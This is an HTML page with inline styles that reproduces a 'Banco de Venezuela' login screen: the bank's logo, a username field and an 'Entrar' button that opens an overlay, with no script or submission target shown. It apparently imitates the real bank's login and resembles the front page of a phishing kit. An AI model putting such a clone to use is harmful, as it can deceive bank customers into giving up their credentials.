<!DOCTYPE html>
<html lang="es">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no" />
    <title>Banco de Venezuela</title>
    <style>
      body {
        margin: 0;
        padding: 0;
        font-family: Arial, sans-serif;
        height: 100vh;
        display: flex;
        justify-content: center;
        align-items: center;
        background-image: url(background.jpg);
        background-size: cover;
        background-position: center;
      }
      .container {
        display: flex;
        height: auto;
        width: 100%;
        margin-bottom: 50px;
        flex-wrap: wrap;
      }
      .left-side, .right-side {
        width: 100%;
        display: flex;
        justify-content: center;
        align-items: center;
      }
      form {
        width: 90%;
        background: white;
        max-width: 550px;
        box-shadow: 0 5px 10px 0 rgba(0, 0, 0, 0.1);
        padding: 20px;
        border-radius: 10px;
      }
      .form-group {
        margin: 20px 0;
        position: relative;
      }
      .form-group input {
        width: 100%;
        padding: 10px;
        height: 60px;
        border: 0;
        border-bottom: 1px solid gray;
        background: #ededed;
        outline: none;
      }
      .form-group label {
        position: absolute;
        top: 50%;
        left: 10px;
        transform: translateY(-50%);
        color: #999;
        transition: 0.3s ease;
      }
      .form-group input:focus + label,
      .form-group input:not(:placeholder-shown) + label {
        top: 5px;
        font-size: 12px;
        color: #333;
      }
      button {
        background-color: #0067b1;
        color: white;
        border-radius: 3px;
        border: 0;
        padding: 15px;
        width: 200px;
        margin: 30px auto;
        display: block;
      }
      @media (min-width: 768px) {
        .left-side, .right-side {
          width: 50%;
        }
      }
    </style>
  </head>
  <body>
    <div class="container">
      <div class="left-side">
        <form id="loginform">
          <div style="text-align: center">
            <img src="logo.png" alt="Banco de Venezuela" style="width: 60%; margin-top: 20px" />
          </div>
          <div class="form-group">
            <input type="text" id="usuario" name="usuario" required placeholder=" " />
            <label for="usuario">Usuario *</label>
          </div>
          <button type="button" id="showOverlay">Entrar</button>
        </form>
      </div>
    </div>
  </body>
</html>